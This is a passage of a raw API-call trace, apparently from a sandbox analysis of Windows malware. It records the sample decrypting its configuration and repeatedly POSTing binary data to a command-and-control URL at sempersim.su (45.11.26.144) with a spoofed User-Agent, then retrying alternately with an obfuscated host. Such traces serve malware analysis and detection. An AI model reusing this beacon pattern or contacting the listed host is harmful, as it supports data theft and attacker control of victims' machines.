0x76600000 [0205.839] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0205.839] GetProcessHeap () returned 0x5b0000 [0205.839] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0205.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0205.840] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0205.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0205.841] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0205.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0205.842] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0205.842] GetProcessHeap () returned 0x5b0000 [0205.842] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0205.842] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdcc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0205.846] GetProcessHeap () returned 0x5b0000 [0205.846] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8e0 [0205.846] socket (af=2, type=1, protocol=6) returned 0x314 [0205.846] connect (s=0x314, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0205.919] FreeAddrInfoW (pAddrInfo=0x5cdcc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0205.920] GetProcessHeap () returned 0x5b0000 [0205.920] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0205.920] GetProcessHeap () returned 0x5b0000 [0205.920] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0205.920] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0205.931] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0205.931] GetProcessHeap () returned 0x5b0000 [0205.931] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0205.931] GetProcessHeap () returned 0x5b0000 [0205.931] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0205.933] GetProcessHeap () returned 0x5b0000 [0205.933] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d32c0 [0205.933] GetProcessHeap () returned 0x5b0000 [0205.933] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0205.934] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0205.935] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0205.935] GetProcessHeap () returned 0x5b0000 [0205.935] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0205.935] GetProcessHeap () returned 0x5b0000 [0205.935] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0205.935] send (s=0x314, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0205.936] send (s=0x314, buf=0x5d1e18*, len=159, flags=0) returned 159 [0205.936] GetProcessHeap () returned 0x5b0000 [0205.936] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0205.936] recv (in: s=0x314, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0207.438] GetProcessHeap () returned 0x5b0000 [0207.438] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0207.438] GetProcessHeap () returned 0x5b0000 [0207.439] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0207.439] GetProcessHeap () returned 0x5b0000 [0207.439] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0207.439] GetProcessHeap () returned 0x5b0000 [0207.439] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0207.440] closesocket (s=0x314) returned 0 [0207.440] GetProcessHeap () returned 0x5b0000 [0207.440] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8e0 | out: hHeap=0x5b0000) returned 1 [0207.440] GetProcessHeap () returned 0x5b0000 [0207.441] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0207.441] GetProcessHeap () returned 0x5b0000 [0207.441] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d34b8 | out: hHeap=0x5b0000) returned 1 [0207.441] GetProcessHeap () returned 0x5b0000 [0207.441] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0207.441] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1240) returned 0x314 [0207.443] Sleep (dwMilliseconds=0xea60) [0207.456] GetProcessHeap () returned 0x5b0000 [0207.457] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2ff0 [0207.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.458] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0207.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.466] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0207.484] GetProcessHeap () returned 0x5b0000 [0207.484] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0207.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.488] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0207.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.490] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0207.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.491] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.491] GetProcessHeap () returned 0x5b0000 [0207.492] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0207.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.493] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2ff0, pdwDataLen=0xdfcfc | out: pbData=0x5d2ff0, pdwDataLen=0xdfcfc) returned 1 [0207.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.494] CryptDestroyKey (hKey=0x5bde08) returned 1 [0207.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.496] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0207.496] GetProcessHeap () returned 0x5b0000 [0207.496] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0207.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0207.498] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0207.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0207.502] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0207.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0207.503] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0207.504] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0207.504] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0207.504] GetProcessHeap () returned 0x5b0000 [0207.504] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0207.504] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0207.504] GetProcessHeap () returned 0x5b0000 [0207.505] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0207.505] GetProcessHeap () returned 0x5b0000 [0207.505] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0207.505] GetProcessHeap () returned 0x5b0000 [0207.505] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ff0 | out: hHeap=0x5b0000) returned 1 [0207.505] GetProcessHeap () returned 0x5b0000 [0207.505] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d33e0 [0207.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.506] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0207.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.512] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5998) returned 1 [0207.521] GetProcessHeap () returned 0x5b0000 [0207.521] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0207.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.522] CryptImportKey (in: hProv=0x5c5998, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0207.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.523] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0207.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.524] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.524] GetProcessHeap () returned 0x5b0000 [0207.524] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0207.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.525] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d33e0, pdwDataLen=0xdfcfc | out: pbData=0x5d33e0, pdwDataLen=0xdfcfc) returned 1 [0207.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.526] CryptDestroyKey (hKey=0x5bde08) returned 1 [0207.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0207.527] CryptReleaseContext (hProv=0x5c5998, dwFlags=0x0) returned 1 [0207.527] GetProcessHeap () returned 0x5b0000 [0207.527] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0207.528] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0207.528] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0207.529] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0207.529] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0207.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0207.531] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0207.531] GetProcessHeap () returned 0x5b0000 [0207.531] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0207.531] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdb38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0207.535] GetProcessHeap () returned 0x5b0000 [0207.535] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9a0 [0207.535] socket (af=2, type=1, protocol=6) returned 0x318 [0207.535] connect (s=0x318, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0207.609] FreeAddrInfoW (pAddrInfo=0x5cdb38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0207.609] GetProcessHeap () returned 0x5b0000 [0207.609] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0207.609] GetProcessHeap () returned 0x5b0000 [0207.609] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0207.610] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0207.611] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0207.611] GetProcessHeap () returned 0x5b0000 [0207.611] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0207.611] GetProcessHeap () returned 0x5b0000 [0207.611] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0207.611] GetProcessHeap () returned 0x5b0000 [0207.611] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3110 [0207.611] GetProcessHeap () returned 0x5b0000 [0207.611] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0207.612] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0207.613] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0207.613] GetProcessHeap () returned 0x5b0000 [0207.613] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0207.614] GetProcessHeap () returned 0x5b0000 [0207.614] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0207.614] send (s=0x318, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0207.615] send (s=0x318, buf=0x5d1e18*, len=159, flags=0) returned 159 [0207.615] GetProcessHeap () returned 0x5b0000 [0207.615] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0207.615] recv (in: s=0x318, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0208.398] GetProcessHeap () returned 0x5b0000 [0208.398] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0208.398] GetProcessHeap () returned 0x5b0000 [0208.399] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3110 | out: hHeap=0x5b0000) returned 1 [0208.399] GetProcessHeap () returned 0x5b0000 [0208.399] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0208.399] GetProcessHeap () returned 0x5b0000 [0208.400] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0208.400] closesocket (s=0x318) returned 0 [0208.401] GetProcessHeap () returned 0x5b0000 [0208.401] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9a0 | out: hHeap=0x5b0000) returned 1 [0208.401] GetProcessHeap () returned 0x5b0000 [0208.401] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0208.401] GetProcessHeap () returned 0x5b0000 [0208.402] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d33e0 | out: hHeap=0x5b0000) returned 1 [0208.402] GetProcessHeap () returned 0x5b0000 [0208.402] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0208.402] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x123c) returned 0x318 [0208.404] Sleep (dwMilliseconds=0xea60) [0208.406] GetProcessHeap () returned 0x5b0000 [0208.406] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0208.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.407] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0208.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.414] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0208.421] GetProcessHeap () returned 0x5b0000 [0208.421] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0208.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.422] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0208.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.423] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0208.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.423] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.423] GetProcessHeap () returned 0x5b0000 [0208.424] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0208.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.425] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0208.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.425] CryptDestroyKey (hKey=0x5be048) returned 1 [0208.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.426] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0208.426] GetProcessHeap () returned 0x5b0000 [0208.426] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0208.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0208.427] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0208.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0208.428] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0208.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0208.429] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0208.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0208.430] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0208.430] GetProcessHeap () returned 0x5b0000 [0208.430] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb1a0 [0208.430] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0208.430] GetProcessHeap () returned 0x5b0000 [0208.430] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0208.430] GetProcessHeap () returned 0x5b0000 [0208.431] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0208.431] GetProcessHeap () returned 0x5b0000 [0208.431] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0208.431] GetProcessHeap () returned 0x5b0000 [0208.431] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0208.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.432] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0208.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.438] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0208.443] GetProcessHeap () returned 0x5b0000 [0208.443] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84d0 [0208.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.444] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c84d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0208.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.445] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0208.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.446] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.446] GetProcessHeap () returned 0x5b0000 [0208.446] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84d0 | out: hHeap=0x5b0000) returned 1 [0208.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.447] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0208.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.448] CryptDestroyKey (hKey=0x5bde08) returned 1 [0208.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0208.449] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0208.449] GetProcessHeap () returned 0x5b0000 [0208.449] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5070 [0208.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0208.450] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0208.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0208.450] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0208.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0208.451] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0208.451] GetProcessHeap () returned 0x5b0000 [0208.451] RtlAllocateHeap (HeapHandle=0x5b0000, 